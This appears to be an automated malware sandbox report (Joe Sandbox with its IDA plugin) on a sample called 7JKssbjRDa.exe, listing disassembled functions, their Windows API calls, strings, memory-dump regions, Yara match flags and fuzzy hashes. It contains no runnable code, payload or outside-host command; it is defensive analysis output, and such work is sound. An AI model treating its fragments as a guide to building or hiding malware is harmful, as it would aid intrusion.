Instruction Fuzzy Hash: 9D01AC3270D3116FBB346FB47C849762B54EB8167A72102B9F724562E1EF59F8127144

Function 10003DFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00000001,?,10003C01,10002DB0,100027A7,?,100029DF,?,00000001,?,?,00000001,?,100167D8,0000000C,10002AD8), ref: 10003E08
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003E16
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10003E2F
SetLastError.KERNEL32(00000000,100029DF,?,00000001,?,?,00000001,?,100167D8,0000000C,10002AD8,?,00000001,?), ref: 10003E81

Memory Dump Source

Source File: 00000000.00000002.3034271041.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.3034230472.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034323562.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034375451.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_7JKssbjRDa.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 6af44c204d35e0e87e783e409bd385f4178bd984da96cbfbdded34095f80bc15
Instruction ID: cea4d4d1ab0609a38d25ccf127c64f3389598815618148a6298b3cccc824aafb
Opcode Fuzzy Hash: 6af44c204d35e0e87e783e409bd385f4178bd984da96cbfbdded34095f80bc15
Instruction Fuzzy Hash: 610124379083A66EF25BC7B49CC964B379AEB0D3F53208329F114410F8EFA29E45A244

Function 00415B18 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_strpbrk.LIBCMT ref: 00415B66
_free.LIBCMT ref: 00415CB2

Strings

*?, xrefs: 00415B5B

Memory Dump Source

Source File: 00000000.00000002.3027894091.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3027894091.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7JKssbjRDa.jbxd

Similarity

API ID: _free_strpbrk
String ID: *?
API String ID: 3300345361-2564092906
Opcode ID: 0b6f9c8e298a88ef6bfcf1d60ea57791d65df11c988ce29e8962c90e9ece18a3
Instruction ID: 08919aac2af5baaa0bc26bb502442345b411eba09a4371073371dd33b5eb5490
Opcode Fuzzy Hash: 0b6f9c8e298a88ef6bfcf1d60ea57791d65df11c988ce29e8962c90e9ece18a3
Instruction Fuzzy Hash: 34613F75E00619DFCB14CFA9C8815EEFBF5EF88354B24816AE815F7300E675AE818B94

Function 04B55D7F Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_strpbrk.LIBCMT ref: 04B55DCD
_free.LIBCMT ref: 04B55F19

Strings

*?, xrefs: 04B55DC2

Memory Dump Source

Source File: 00000000.00000002.3032420897.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_7JKssbjRDa.jbxd

Yara matches

Similarity

API ID: _free_strpbrk
String ID: *?
API String ID: 3300345361-2564092906
Opcode ID: 9801757e2809db45aacd2951d7023101c81a7ef7fa1d77123c738ef8fc315dd7
Instruction ID: 1b74f13dbcba2150a1fd9868d0adae7fc2dc7661cc718da73cb4b4ef5f34790c
Opcode Fuzzy Hash: 9801757e2809db45aacd2951d7023101c81a7ef7fa1d77123c738ef8fc315dd7
Instruction Fuzzy Hash: 3E615F75E00219AFDF24DFA8C8806EDFBF5EF48314B1585AAE815F7354D631AE418B90

Function 04D04F18 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_strpbrk.LIBCMT ref: 04D04F66
_free.LIBCMT ref: 04D050B2

Strings

*?, xrefs: 04D04F5B

Memory Dump Source

Source File: 00000000.00000003.2523875768.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4cf0000_7JKssbjRDa.jbxd

Similarity

API ID: _free_strpbrk
String ID: *?
API String ID: 3300345361-2564092906
Opcode ID: 9801757e2809db45aacd2951d7023101c81a7ef7fa1d77123c738ef8fc315dd7
Instruction ID: eb8b773fb91e2d91cba27857834897654ba0c042a2d2c54a93f6668a60fb86b1
Opcode Fuzzy Hash: 9801757e2809db45aacd2951d7023101c81a7ef7fa1d77123c738ef8fc315dd7
Instruction Fuzzy Hash: A6613CB5E00219AFDB14CFA8D890AEDFBF5FF48314B24816AD915E7340E675AE418B90

Function 04B56383 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\7JKssbjRDa.exe, xrefs: 04B56388

Memory Dump Source

Source File: 00000000.00000002.3032420897.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_7JKssbjRDa.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user\Desktop\7JKssbjRDa.exe
API String ID: 0-3135480320
Opcode ID: 93954dfdee92f46bb96adc8c87a9eb3aaf0f63e636dd7cac714efb5796973790
Instruction ID: f552e073e65239589d6095b5991a64c7f020a132d82bace3d2b8a8f69f5e1887
Opcode Fuzzy Hash: 93954dfdee92f46bb96adc8c87a9eb3aaf0f63e636dd7cac714efb5796973790
Instruction Fuzzy Hash: 7221D471600105BFEB20BF698C80E6BB7ADEF402A874185A4FD2DC7260E731FC519760

Function 10008336 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\7JKssbjRDa.exe, xrefs: 1000833B

Memory Dump Source

Source File: 00000000.00000002.3034271041.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.3034230472.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034323562.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034375451.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_7JKssbjRDa.jbxd

Similarity

API ID:
String ID: C:\Users\user\Desktop\7JKssbjRDa.exe
API String ID: 0-3135480320
Opcode ID: ddfca3805b10fb0c405c12195d97b130fb222a2330a05fb996068ff6147a541c
Instruction ID: d1df9cd49d1a9d965a935ddcfcfd3b9185eaf4079d6f623355f3cc1fa6217373
Opcode Fuzzy Hash: ddfca3805b10fb0c405c12195d97b130fb222a2330a05fb996068ff6147a541c
Instruction Fuzzy Hash: C821D075A00206BFF710DF61CC8090B779CFF846E47108124FA949215AEB31EF0087A0

Function 0040BE17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,0040BED8,?,?,0042B000,00000000,?,0040C003,00000004,InitializeCriticalSectionEx,0041EAF4,InitializeCriticalSectionEx,00000000), ref: 0040BEA7

Strings

api-ms-, xrefs: 0040BE67

Memory Dump Source

Source File: 00000000.00000002.3027894091.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3027894091.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7JKssbjRDa.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: 8c81ecf0019ecd7373f14f2a550921ad389bcfade9b3345979a598c502b3af19
Instruction ID: 1d2ba87bd7351691bab4046b775a4f225d6c09ed93031ba1482b23a36008251d
Opcode Fuzzy Hash: 8c81ecf0019ecd7373f14f2a550921ad389bcfade9b3345979a598c502b3af19
Instruction Fuzzy Hash: 1B11C135A41620ABCB228B68DC45BDA7794EF02760F114632EE05B73C0D778EC058ADD

Function 0040EF4F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,0040EF44,?,?,0040EF0C,00000000,7622DF80,?), ref: 0040EF64
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040EF77
FreeLibrary.KERNEL32(00000000,?,?,0040EF44,?,?,0040EF0C,00000000,7622DF80,?), ref: 0040EF9A

Strings

mscoree.dll, xrefs: 0040EF5D
CorExitProcess, xrefs: 0040EF6F

Memory Dump Source

Source File: 00000000.00000002.3027894091.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3027894091.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7JKssbjRDa.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 607d73432645c26095c79918e0b94193a9778d3018f0e4e6e685341166a2a245
Instruction ID: a9aeb9bb373945a448fb4c2f2a76f55d061337ba3b70deabe2e5838c542f66b1
Opcode Fuzzy Hash: 607d73432645c26095c79918e0b94193a9778d3018f0e4e6e685341166a2a245
Instruction Fuzzy Hash: E0F0A070A0421AFBCB119B52ED09BDEBF78EF00759F144071F905B21A0CB788E11DB98

Function 10005FAA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,10005F5C,?,?,10005F24,?,?,?), ref: 10005FBF
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10005FD2
FreeLibrary.KERNEL32(00000000,?,?,10005F5C,?,?,10005F24,?,?,?), ref: 10005FF5

Strings

mscoree.dll, xrefs: 10005FB8
CorExitProcess, xrefs: 10005FCA

Memory Dump Source

Source File: 00000000.00000002.3034271041.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.3034230472.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034323562.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034375451.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_7JKssbjRDa.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 72e1e31047de7c6f2cb357695238b525e407410b4f5b93aeb37e18346654144b
Instruction ID: ce5d81a5a20928f213bfffb098e7a6005668583a74e8757c7f390ca8b74bdc84
Opcode Fuzzy Hash: 72e1e31047de7c6f2cb357695238b525e407410b4f5b93aeb37e18346654144b
Instruction Fuzzy Hash: 1BF01C31904129FBEB06DB91CD0ABEE7AB9EB047D6F1041B4F501A21A4CBB5CE41DB90

Function 1000A5DD Relevance: 7.7, APIs: 5, Instructions: 244COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,1000A899,00000000,00000000,00000000,00000001,?,?,?,?,00000001), ref: 1000A680
__alloca_probe_16.LIBCMT ref: 1000A736
__alloca_probe_16.LIBCMT ref: 1000A7CC
__freea.LIBCMT ref: 1000A837
__freea.LIBCMT ref: 1000A843

Memory Dump Source

Source File: 00000000.00000002.3034271041.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.3034230472.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034323562.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034375451.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_7JKssbjRDa.jbxd

Similarity

API ID: __alloca_probe_16__freea$Info
String ID:
API String ID: 2330168043-0
Opcode ID: 8cc199d558b997503fdcee74a17b35d0cfef9a10842a3a6720ec3a40d10b29e0
Instruction ID: 1dd90d70d9504398cfa9d6ef4ea6864651e072268de8b4bf5549d7cf43e308ef
Opcode Fuzzy Hash: 8cc199d558b997503fdcee74a17b35d0cfef9a10842a3a6720ec3a40d10b29e0
Instruction Fuzzy Hash: C081A472D042569BFF11CE648C81ADE7BF5EF0B6D0F158265E904AB148DB369DC1CBA0

Function 004136A0 Relevance: 7.7, APIs: 5, Instructions: 199COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00413724
__alloca_probe_16.LIBCMT ref: 004137EA
__freea.LIBCMT ref: 00413856

Part of subcall function 0041249E: RtlAllocateHeap.NTDLL(00000000,?,?,?,0040A15B,?,?,?,004010EC,?,004034A7,?,?,?), ref: 004124D0

__freea.LIBCMT ref: 0041385F
__freea.LIBCMT ref: 00413882

Memory Dump Source

Source File: 00000000.00000002.3027894091.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3027894091.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7JKssbjRDa.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: 108019662ccab921f27eff110a88a80a1d8b3600edd5f6f257505aea3f790572
Instruction ID: 356f55c8d52bf468307c9bd9aee3ed648f54657124d7a114e97aef17e3d97ec8
Opcode Fuzzy Hash: 108019662ccab921f27eff110a88a80a1d8b3600edd5f6f257505aea3f790572
Instruction Fuzzy Hash: 6151D3B2600206ABEF20AF55CC41EEB36E9EF44755F15412EFD18E7290D738DE9186A8

Function 04D02AA0 Relevance: 7.7, APIs: 5, Instructions: 199COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 04D02B24
__alloca_probe_16.LIBCMT ref: 04D02BEA
__freea.LIBCMT ref: 04D02C56
__freea.LIBCMT ref: 04D02C5F
__freea.LIBCMT ref: 04D02C82

Memory Dump Source

Source File: 00000000.00000003.2523875768.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4cf0000_7JKssbjRDa.jbxd

Similarity

API ID: __freea$__alloca_probe_16
String ID:
API String ID: 3509577899-0
Opcode ID: 378295b6f49c7a1482985147ff9c11c2e1bf4f3a81760b0e32bf93aa04d95b4b
Instruction ID: 7078b575cb70d1788cb53d15e2d783d1a5897dafc2c62b17d3425db1a5964cda
Opcode Fuzzy Hash: 378295b6f49c7a1482985147ff9c11c2e1bf4f3a81760b0e32bf93aa04d95b4b
Instruction Fuzzy Hash: 1D510472601216AFEF209F608C89FBB37A9EF84354F1981A9FD04E7180E735FC5196A4

Function 1000AFB7 Relevance: 7.7, APIs: 5, Instructions: 199COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 1000B03B
__alloca_probe_16.LIBCMT ref: 1000B101
__freea.LIBCMT ref: 1000B16D

Part of subcall function 100079EE: RtlAllocateHeap.NTDLL(00000000,10001F83,?,?,10002743,10001F83,?,10001F83,0007A120), ref: 10007A20

__freea.LIBCMT ref: 1000B176
__freea.LIBCMT ref: 1000B199

Memory Dump Source

Source File: 00000000.00000002.3034271041.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.3034230472.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034323562.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034375451.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_7JKssbjRDa.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: e63f2a8978e00137fdd1d9a780ebd3875915c182c7a46276be8a26015b9944ff
Instruction ID: ca0e6193c5ab93552cef367aef9b2c098b98f9a761b18089088d519bce5e91c7
Opcode Fuzzy Hash: e63f2a8978e00137fdd1d9a780ebd3875915c182c7a46276be8a26015b9944ff
Instruction Fuzzy Hash: 6651C072600616ABFB21CF64CC81EAF37E9EF456D0F624129FD14A7158EB34EC5197A0

Function 04B42BB7 Relevance: 7.6, APIs: 5, Instructions: 113memorywindowCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 04B42C5F
GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 04B42C74
FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 04B42C82
LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 04B42C9D
OutputDebugStringA.KERNEL32(00000000,?,?), ref: 04B42CBC

Memory Dump Source

Source File: 00000000.00000002.3032420897.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_7JKssbjRDa.jbxd

Yara matches

Similarity

API ID: AllocDebugErrorFormatLastLocalMessageOutputProtectStringVirtual
String ID:
API String ID: 2509773233-0
Opcode ID: 98a23b1f51539c79b15504070a912fe8a1d772cf35a21b11453b2abeaae28325
Instruction ID: 8e0c3b542556c10dfa7e3922ea7325ac6b0ed9a3e589e4877d3c30077f841730
Opcode Fuzzy Hash: 98a23b1f51539c79b15504070a912fe8a1d772cf35a21b11453b2abeaae28325
Instruction Fuzzy Hash: 71310471B00014AFDB18DF68DC45FBAB768EF88704F0541E9F905EB252DB31A912EB94

Function 10002986 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

APIs

dllmain_raw.LIBCMT ref: 100029C3
dllmain_crt_dispatch.LIBCMT ref: 100029DA
dllmain_raw.LIBCMT ref: 10002A22
dllmain_crt_dispatch.LIBCMT ref: 10002A35
dllmain_raw.LIBCMT ref: 10002A48

Memory Dump Source

Source File: 00000000.00000002.3034271041.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.3034230472.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034323562.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034375451.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_7JKssbjRDa.jbxd

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: c90a93295f6bc331d57bb8f47297671563acdadf013a8df03a89f4d1d37c88ce
Instruction ID: 86b98bd5048e9daedf5606c3f96c4c2c05ee8e367bee4de8e4e1682ebb6c2564
Opcode Fuzzy Hash: c90a93295f6bc331d57bb8f47297671563acdadf013a8df03a89f4d1d37c88ce
Instruction Fuzzy Hash: EA21A476E0526AAFFB32CF55CC41ABF3AA9EB85AD0F014115FC4867258CB309D419BD1

Function 00416FE1 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00416FF9

Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA

_free.LIBCMT ref: 0041700B
_free.LIBCMT ref: 0041701D
_free.LIBCMT ref: 0041702F
_free.LIBCMT ref: 00417041

Memory Dump Source

Source File: 00000000.00000002.3027894091.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3027894091.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7JKssbjRDa.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: e9905c8b19ab3d426ab646f49b16c807e4d2b9b7b2a9eaa828597b4964810506
Instruction ID: 1bbc7c59558bdb80d40cd5d769ae83ba842cf1fe79b15496f27bd1d3c69b9f62
Opcode Fuzzy Hash: e9905c8b19ab3d426ab646f49b16c807e4d2b9b7b2a9eaa828597b4964810506
Instruction Fuzzy Hash: 2AF04432705240678534DB5DE486D967BE9AF44760758481BF508D7A12D73CFCD0465C

Function 04B57248 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 04B57260

Part of subcall function 04B51D29: HeapFree.KERNEL32(00000000,00000000,?,04B572DB,?,00000000,?,?,?,04B57302,?,00000007,?,?,04B575E1,?), ref: 04B51D3F
Part of subcall function 04B51D29: GetLastError.KERNEL32(?,?,04B572DB,?,00000000,?,?,?,04B57302,?,00000007,?,?,04B575E1,?,?), ref: 04B51D51

_free.LIBCMT ref: 04B57272
_free.LIBCMT ref: 04B57284
_free.LIBCMT ref: 04B57296
_free.LIBCMT ref: 04B572A8

Memory Dump Source

Source File: 00000000.00000002.3032420897.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_7JKssbjRDa.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 66f692938bcf18abe0cb3e5c7653619a9fabf3dc7bd25fd00b9023d19967cfd6
Instruction ID: 483566ea0ef53b89664ed2dd7fd9b40260e4331b71de85a4830a2d39d41bba32
Opcode Fuzzy Hash: 66f692938bcf18abe0cb3e5c7653619a9fabf3dc7bd25fd00b9023d19967cfd6
Instruction Fuzzy Hash: CEF04432B142146BCA34DB58F586E16B3DDEB01720BA40885FC28D7560CF25FC914A54

Function 04D063E1 Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 04D063F9
_free.LIBCMT ref: 04D0640B
_free.LIBCMT ref: 04D0641D
_free.LIBCMT ref: 04D0642F
_free.LIBCMT ref: 04D06441

Memory Dump Source

Source File: 00000000.00000003.2523875768.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4cf0000_7JKssbjRDa.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 66f692938bcf18abe0cb3e5c7653619a9fabf3dc7bd25fd00b9023d19967cfd6
Instruction ID: 54cec943bd09dcb00d1e415c4998b77d12b3387c5f97587b3f5c2d953b93fd55
Opcode Fuzzy Hash: 66f692938bcf18abe0cb3e5c7653619a9fabf3dc7bd25fd00b9023d19967cfd6
Instruction Fuzzy Hash: 48F06272705210B78725DF5CF886F2673D9FB00720BA4C819F508E7582CB35F8A28665

Function 1000C51E Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 1000C536

Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64

_free.LIBCMT ref: 1000C548
_free.LIBCMT ref: 1000C55A
_free.LIBCMT ref: 1000C56C
_free.LIBCMT ref: 1000C57E

Memory Dump Source

Source File: 00000000.00000002.3034271041.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.3034230472.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034323562.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034375451.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_7JKssbjRDa.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 5af9cd1d934eff50961f68469d6981d65bd4349cdb7ac1437da5aad4e87a5e75
Instruction ID: 9141c028a1f6e8267eca5b553c4c44ea57822cd8596d4ab818939ac7a44c1903
Opcode Fuzzy Hash: 5af9cd1d934eff50961f68469d6981d65bd4349cdb7ac1437da5aad4e87a5e75
Instruction Fuzzy Hash: BEF0E739A046289BE650DB68ECC2C1A73D9FB456E17608805F448E7699CB34FFC08AA4

Function 04B458D0 Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 476COMMON

Download Yara Rule

Strings

rB, xrefs: 04B46527
rB, xrefs: 04B459EE
O*, xrefs: 04B45A5F

Memory Dump Source

Source File: 00000000.00000002.3032420897.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_7JKssbjRDa.jbxd

Yara matches

Similarity

API ID:
String ID: O*$rB$rB
API String ID: 0-546290271
Opcode ID: f523bc33ae5dcf39d7c7f9cffc68d396c9ac6c1ced86010178b4c982eee15dc0
Instruction ID: b76375a6d1ccb6514fecc0a490c549058fda5aaf315fa6300b765a8ff46226aa
Opcode Fuzzy Hash: f523bc33ae5dcf39d7c7f9cffc68d396c9ac6c1ced86010178b4c982eee15dc0
Instruction Fuzzy Hash: 52121771D002489BEB18EBB8DC54BEDB7B4EF95308F1080E8E54567191EF34BA49EB61

Function 04B4516B Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 383sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 04B493D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B493E2
Part of subcall function 04B493D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B4941F

__Init_thread_footer.LIBCMT ref: 04B451B2

Part of subcall function 04B4938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B49397
Part of subcall function 04B4938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B493CA

Sleep.KERNEL32(000007D0), ref: 04B4552A
Sleep.KERNEL32(000007D0), ref: 04B45544

Strings

updateSW, xrefs: 04B4544F

Memory Dump Source

Source File: 00000000.00000002.3032420897.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_7JKssbjRDa.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeaveSleep$Init_thread_footer
String ID: updateSW
API String ID: 500923978-2484434887
Opcode ID: a48b40eb8ce9b0f2e770e20945fe188cfd2cc4dc723a840eb928d6538466b87f
Instruction ID: c6fd249a583e1bd64c1d0d5cf636f5f3d56e5160116afebae93ef7f49f3738a4
Opcode Fuzzy Hash: a48b40eb8ce9b0f2e770e20945fe188cfd2cc4dc723a840eb928d6538466b87f
Instruction Fuzzy Hash: CED1D4B1A005649BEB38DB28CC887ADB771EFC1308F1441E9D9096B295DB75AEC4DB41

Function 10007CBA Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 10007E54

Strings

*?, xrefs: 10007CFD

Memory Dump Source

Source File: 00000000.00000002.3034271041.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.3034230472.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034323562.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034375451.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_7JKssbjRDa.jbxd

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: 5cf7f851aaec087829ec43eeaab6f60b67ed4c75ee81a41c35adb74eb9a8a420
Instruction ID: 7b94f7270babd41a129a228fbe6cecbdc5f775369f8c1ab1d48f9322781d5c4e
Opcode Fuzzy Hash: 5cf7f851aaec087829ec43eeaab6f60b67ed4c75ee81a41c35adb74eb9a8a420
Instruction Fuzzy Hash: 0C614175D0021A9FEB14CFA9C8815EDFBF5FF48390B2581AAE809F7344D675AE418B90

Function 10004F12 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,10004EC3,00000000,?,00000001,?,?,?,10004FB2,00000001,FlsFree,10011CC0,FlsFree), ref: 10004F1F
GetLastError.KERNEL32(?,10004EC3,00000000,?,00000001,?,?,?,10004FB2,00000001,FlsFree,10011CC0,FlsFree,00000000,?,10003ECF), ref: 10004F29
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 10004F51

Strings

api-ms-, xrefs: 10004F36

Memory Dump Source

